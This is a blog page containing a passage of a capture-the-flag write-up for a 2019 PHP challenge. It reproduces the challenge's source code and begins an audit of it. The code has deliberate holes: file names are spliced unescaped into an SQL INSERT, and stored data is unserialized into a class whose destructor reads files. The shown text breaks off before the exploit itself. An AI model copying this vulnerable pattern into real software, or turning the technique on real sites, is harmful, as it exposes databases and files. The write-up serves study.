
  <!DOCTYPE html>
  <html lang="zh-CN"  >
  <head>
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_bq08450reo';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};</script>
  
  <title>
    [安洵杯 2019]不是文件上传 |
    
    KL
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_bq08450reo.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="这个题过于cs了 一直以为是个文件上传的题，但怎么也注入不了，看题解题解说这是一个反序列化配合sql题…八竿子打不着 题目给了源码  代码审计 upload.php 12345678910111213141516171819&lt;?phpinclude(&quot;.&#x2F;helper.php&quot;);class upload extends helper &#123;	public fun">
<meta property="og:type" content="article">
<meta property="og:title" content="[安洵杯 2019]不是文件上传">
<meta property="og:url" content="http://example.com/2025/05/01/[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]%E4%B8%8D%E6%98%AF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="KL">
<meta property="og:description" content="这个题过于cs了 一直以为是个文件上传的题，但怎么也注入不了，看题解题解说这是一个反序列化配合sql题…八竿子打不着 题目给了源码  代码审计 upload.php 12345678910111213141516171819&lt;?phpinclude(&quot;.&#x2F;helper.php&quot;);class upload extends helper &#123;	public fun">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/05/01/images/20250426115013719.png">
<meta property="article:published_time" content="2025-05-01T03:49:03.000Z">
<meta property="article:modified_time" content="2025-05-05T14:29:48.126Z">
<meta property="article:author" content="FuB0Y">
<meta property="article:tag" content="php反序列化">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/05/01/images/20250426115013719.png">
  
  
    <link rel="alternate" href="/atom.xml" title="KL" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.css">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    <picture></picture>
    <img fetchpriority="high" src="/../images/126839103p0master1200.jpg" alt="[安洵杯 2019]不是文件上传">
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">[安洵杯 2019]不是文件上传</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text"> 代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text"> 解题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0exp"><span class="toc-number">2.1.</span> <span class="toc-text"> 构造exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6%E5%90%8D"><span class="toc-number">2.2.</span> <span class="toc-text"> 构造恶意文件名</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">186</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">4</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">179</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
</aside>

          <section id="main"><article id="post-[安洵杯 2019]不是文件上传" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/05/01/%5B%E5%AE%89%E6%B4%B5%E6%9D%AF%202019%5D%E4%B8%8D%E6%98%AF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-05-01T03:49:03.000Z" itemprop="datePublished">2025-05-01</time>
    <time style="display: none;" id="post-update-time">2025-05-05</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%88%B7%E9%A2%98/" data-aos="zoom-in">刷题</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <p><img src="../images/20250426115013719.png" alt="image-20250426115013719" /></p>
<p>这个题过于cs了</p>
<p>一直以为是个文件上传的题，但怎么也注入不了，看题解题解说这是一个反序列化配合sql题…八竿子打不着</p>
<p>题目给了源码</p>
<h2 id="代码审计"><a class="markdownIt-Anchor" href="#代码审计"></a> 代码审计</h2>
<p>upload.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include(&quot;./helper.php&quot;);</span><br><span class="line">class upload extends helper &#123;</span><br><span class="line">	public function upload_base()&#123;</span><br><span class="line">		$this-&gt;upload();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if ($_FILES)&#123;</span><br><span class="line">	if ($_FILES[&quot;file&quot;][&quot;error&quot;])&#123;</span><br><span class="line">		die(&quot;Upload file failed.&quot;);</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		$file = new upload();</span><br><span class="line">		$file-&gt;upload_base();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new helper();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>show.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include(&quot;./helper.php&quot;);</span><br><span class="line">$show = new show();</span><br><span class="line">if($_GET[&quot;delete_all&quot;])&#123;</span><br><span class="line">	if($_GET[&quot;delete_all&quot;] == &quot;true&quot;)&#123;</span><br><span class="line">		$show-&gt;Delete_All_Images();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$show-&gt;Get_All_Images();</span><br><span class="line"></span><br><span class="line">class show&#123;</span><br><span class="line">	public $con;</span><br><span class="line"></span><br><span class="line">	public function __construct()&#123;</span><br><span class="line">		$this-&gt;con = mysqli_connect(&quot;127.0.0.1&quot;,&quot;r00t&quot;,&quot;r00t&quot;,&quot;pic_base&quot;);</span><br><span class="line">		if (mysqli_connect_errno($this-&gt;con))&#123; </span><br><span class="line">   			die(&quot;Connect MySQL Fail:&quot;.mysqli_connect_error());</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	public function Get_All_Images()&#123;</span><br><span class="line">		$sql = &quot;SELECT * FROM images&quot;;</span><br><span class="line">		$result = mysqli_query($this-&gt;con, $sql);</span><br><span class="line">		if ($result-&gt;num_rows &gt; 0)&#123;</span><br><span class="line">		    while($row = $result-&gt;fetch_assoc())&#123;</span><br><span class="line">		    	if($row[&quot;attr&quot;])&#123;</span><br><span class="line">		    		$attr_temp = str_replace(&#x27;\0\0\0&#x27;, chr(0).&#x27;*&#x27;.chr(0), $row[&quot;attr&quot;]);</span><br><span class="line">					$attr = unserialize($attr_temp);</span><br><span class="line">				&#125;</span><br><span class="line">		        echo &quot;&lt;p&gt;id=&quot;.$row[&quot;id&quot;].&quot; filename=&quot;.$row[&quot;filename&quot;].&quot; path=&quot;.$row[&quot;path&quot;].&quot;&lt;/p&gt;&quot;;</span><br><span class="line">		    &#125;</span><br><span class="line">		&#125;else&#123;</span><br><span class="line">		    echo &quot;&lt;p&gt;You have not uploaded an image yet.&lt;/p&gt;&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		mysqli_close($this-&gt;con);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	public function Delete_All_Images()&#123;</span><br><span class="line">		$sql = &quot;DELETE FROM images&quot;;</span><br><span class="line">		$result = mysqli_query($this-&gt;con, $sql);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>helper.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// 定义一个名为 helper 的类，用于处理图片上传和相关操作</span><br><span class="line">class helper &#123;</span><br><span class="line">    // 定义一个受保护的属性 $folder，用于存储上传图片的文件夹路径</span><br><span class="line">    protected $folder = &quot;pic/&quot;;</span><br><span class="line">    // 定义一个受保护的属性 $ifview，用于控制文件查看功能是否可用，初始值为 False</span><br><span class="line">    protected $ifview = False;</span><br><span class="line">    // 定义一个受保护的属性 $config，用于指定配置文件的名称</span><br><span class="line">    protected $config = &quot;config.txt&quot;;</span><br><span class="line">    // 注释说明该类中的某些功能还不完善，尚未开放</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 upload，用于处理图片上传操作，默认表单文件字段名为 &quot;file&quot;</span><br><span class="line">    public function upload($input=&quot;file&quot;)</span><br><span class="line">    &#123;</span><br><span class="line">        // 调用 getfile 方法获取上传文件的相关信息</span><br><span class="line">        $fileinfo = $this-&gt;getfile($input);</span><br><span class="line">        // 初始化一个空数组 $array，用于存储文件的详细信息</span><br><span class="line">        $array = array();</span><br><span class="line">        // 将文件的标题信息存入数组</span><br><span class="line">        $array[&quot;title&quot;] = $fileinfo[&#x27;title&#x27;];</span><br><span class="line">        // 将文件名存入数组</span><br><span class="line">        $array[&quot;filename&quot;] = $fileinfo[&#x27;filename&#x27;];</span><br><span class="line">        // 将文件扩展名存入数组</span><br><span class="line">        $array[&quot;ext&quot;] = $fileinfo[&#x27;ext&#x27;];</span><br><span class="line">        // 将文件存储路径存入数组</span><br><span class="line">        $array[&quot;path&quot;] = $fileinfo[&#x27;path&#x27;];</span><br><span class="line">        // 使用 getimagesize 函数获取上传图片的尺寸信息，返回一个数组</span><br><span class="line">        $img_ext = getimagesize($_FILES[$input][&quot;tmp_name&quot;]);</span><br><span class="line">        // 从尺寸信息数组中提取图片的宽度和高度，存入新数组 $my_ext</span><br><span class="line">        $my_ext = array(&quot;width&quot;=&gt;$img_ext[0],&quot;height&quot;=&gt;$img_ext[1]);</span><br><span class="line">        // 使用 serialize 函数将 $my_ext 数组序列化为字符串，并将其存入 $array 数组的 &quot;attr&quot; 键中</span><br><span class="line">        $array[&quot;attr&quot;] = serialize($my_ext);</span><br><span class="line">        // 调用 save 方法将文件信息保存到数据库，并获取保存后的记录 ID</span><br><span class="line">        $id = $this-&gt;save($array);</span><br><span class="line">        // 如果保存操作返回的 ID 为 0，表示保存失败，输出错误信息并终止脚本</span><br><span class="line">        if ($id == 0)&#123;</span><br><span class="line">            die(&quot;Something wrong!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        // 输出换行符</span><br><span class="line">        echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">        // 输出上传成功的提示信息，包含图片的 ID</span><br><span class="line">        echo &quot;&lt;p&gt;Your images is uploaded successfully. And your image&#x27;s id is $id.&lt;/p&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 getfile，用于获取上传文件的相关信息</span><br><span class="line">    public function getfile($input)</span><br><span class="line">    &#123;</span><br><span class="line">        // 检查 $input 是否被设置</span><br><span class="line">        if(isset($input))&#123;</span><br><span class="line">            // 调用 check 方法对上传文件的信息进行检查，并将结果存储在 $rs 中</span><br><span class="line">            $rs = $this-&gt;check($_FILES[$input]);</span><br><span class="line">        &#125;</span><br><span class="line">        // 返回检查后的文件信息</span><br><span class="line">        return $rs;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 check，用于检查上传文件的合法性</span><br><span class="line">    public function check($info)</span><br><span class="line">    &#123;</span><br><span class="line">        // 生成一个唯一的文件名，使用当前时间和唯一 ID 进行 MD5 加密，截取中间 16 位</span><br><span class="line">        $basename = substr(md5(time().uniqid()),9,16);</span><br><span class="line">        // 获取上传文件的原始文件名</span><br><span class="line">        $filename = $info[&quot;name&quot;];</span><br><span class="line">        // 从文件名中提取文件扩展名</span><br><span class="line">        $ext = substr(strrchr($filename, &#x27;.&#x27;), 1);</span><br><span class="line">        // 定义一个允许上传的文件扩展名数组</span><br><span class="line">        $cate_exts = array(&quot;jpg&quot;,&quot;gif&quot;,&quot;png&quot;,&quot;jpeg&quot;);</span><br><span class="line">        // 检查上传文件的扩展名是否在允许的扩展名数组中</span><br><span class="line">        if(!in_array($ext,$cate_exts))&#123;</span><br><span class="line">            // 如果不在允许的扩展名数组中，输出错误信息并终止脚本</span><br><span class="line">            die(&quot;&lt;p&gt;Please upload the correct image file!!!&lt;/p&gt;&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        // 从文件名中去除扩展名，得到文件标题</span><br><span class="line">        $title = str_replace(&quot;.&quot;.$ext,&#x27;&#x27;,$filename);</span><br><span class="line">        // 返回一个包含文件标题、文件名、扩展名和存储路径的数组</span><br><span class="line">        return array(&#x27;title&#x27;=&gt;$title,&#x27;filename&#x27;=&gt;$basename.&quot;.&quot;.$ext,&#x27;ext&#x27;=&gt;$ext,&#x27;path&#x27;=&gt;$this-&gt;folder.$basename.&quot;.&quot;.$ext);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 save，用于将文件信息保存到数据库</span><br><span class="line">    public function save($data)</span><br><span class="line">    &#123;</span><br><span class="line">        // 检查 $data 是否为空或不是数组</span><br><span class="line">        if(!$data || !is_array($data))&#123;</span><br><span class="line">            // 如果条件满足，输出错误信息并终止脚本</span><br><span class="line">            die(&quot;Something wrong!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        // 调用 insert_array 方法将文件信息插入数据库，并获取插入记录的 ID</span><br><span class="line">        $id = $this-&gt;insert_array($data);</span><br><span class="line">        // 返回插入记录的 ID</span><br><span class="line">        return $id;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 insert_array，用于将数组数据插入数据库</span><br><span class="line">    public function insert_array($data)</span><br><span class="line">    &#123;</span><br><span class="line">        // 连接到本地 MySQL 数据库，使用用户名 &quot;r00t&quot;、密码 &quot;r00t&quot; 和数据库名 &quot;pic_base&quot;</span><br><span class="line">        $con = mysqli_connect(&quot;127.0.0.1&quot;,&quot;r00t&quot;,&quot;r00t&quot;,&quot;pic_base&quot;);</span><br><span class="line">        // 检查数据库连接是否失败</span><br><span class="line">        if (mysqli_connect_errno($con))</span><br><span class="line">        &#123;</span><br><span class="line">            // 如果连接失败，输出错误信息并终止脚本</span><br><span class="line">            die(&quot;Connect MySQL Fail:&quot;.mysqli_connect_error());</span><br><span class="line">        &#125;</span><br><span class="line">        // 初始化一个空数组 $sql_fields，用于存储 SQL 语句中的字段名</span><br><span class="line">        $sql_fields = array();</span><br><span class="line">        // 初始化一个空数组 $sql_val，用于存储 SQL 语句中的字段值</span><br><span class="line">        $sql_val = array();</span><br><span class="line">        // 遍历 $data 数组，将字段名和字段值分别存储到 $sql_fields 和 $sql_val 数组中</span><br><span class="line">        foreach($data as $key=&gt;$value)&#123;</span><br><span class="line">            // 对字段名中的特殊字符进行替换</span><br><span class="line">            $key_temp = str_replace(chr(0).&#x27;*&#x27;.chr(0), &#x27;\0\0\0&#x27;, $key);</span><br><span class="line">            // 对字段值中的特殊字符进行替换</span><br><span class="line">            $value_temp = str_replace(chr(0).&#x27;*&#x27;.chr(0), &#x27;\0\0\0&#x27;, $value);</span><br><span class="line">            // 将处理后的字段名添加到 $sql_fields 数组中，并添加反引号</span><br><span class="line">            $sql_fields[] = &quot;`&quot;.$key_temp.&quot;`&quot;;</span><br><span class="line">            // 将处理后的字段值添加到 $sql_val 数组中，并添加单引号</span><br><span class="line">            $sql_val[] = &quot;&#x27;&quot;.$value_temp.&quot;&#x27;&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        // 构建 SQL 插入语句，将字段名和字段值分别用逗号连接</span><br><span class="line">        $sql = &quot;INSERT INTO images (&quot;.(implode(&quot;,&quot;,$sql_fields)).&quot;) VALUES(&quot;.(implode(&quot;,&quot;,$sql_val)).&quot;)&quot;;</span><br><span class="line">        // 执行 SQL 插入语句</span><br><span class="line">        mysqli_query($con, $sql);</span><br><span class="line">        // 获取插入记录的 ID</span><br><span class="line">        $id = mysqli_insert_id($con);</span><br><span class="line">        // 关闭数据库连接</span><br><span class="line">        mysqli_close($con);</span><br><span class="line">        // 返回插入记录的 ID</span><br><span class="line">        return $id;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义一个公共方法 view_files，用于查看文件内容</span><br><span class="line">    public function view_files($path)&#123;</span><br><span class="line">        // 检查 $ifview 属性是否为 False</span><br><span class="line">        if ($this-&gt;ifview == False)&#123;</span><br><span class="line">            // 如果为 False，返回 False，表示文件查看功能不可用</span><br><span class="line">            return False;</span><br><span class="line">            // 注释说明该功能还不完善，尚未开放</span><br><span class="line">        &#125;</span><br><span class="line">        // 使用 file_get_contents 函数读取文件内容</span><br><span class="line">        $content = file_get_contents($path);</span><br><span class="line">        // 输出文件内容</span><br><span class="line">        echo $content;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    // 定义析构函数，当对象被销毁时自动调用</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        # 读取一些配置文件的内容</span><br><span class="line">        // 调用 view_files 方法读取配置文件内容</span><br><span class="line">        $this-&gt;view_files($this-&gt;config);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>helper.php定义了一个 helper 类，主要用于处理图片上传操作。包含了上传文件信息获取、文件合法性检查、文件信息保存到数据库等功能，还有一个文件查看功能，但该功能默认未开放。在对象销毁时，会尝试读取并输出配置文件的内容。代码存在 <strong>SQL 注入风险</strong>，因为在构建 SQL 插入语句时没有对用户输入进行充分的转义处理</p>
<p>insert_array 方法中构建 SQL 插入语句时，直接将用户输入的数据拼接到 SQL 语句里，却未对其进行充分的转义处理。下面详细说明如何进行 SQL 注入攻击以及相应的攻击原理。</p>
<p><strong>分析代码中的 SQL 语句构造</strong></p>
<p>在 <code>insert_array</code> 方法里，SQL 插入语句构建</p>
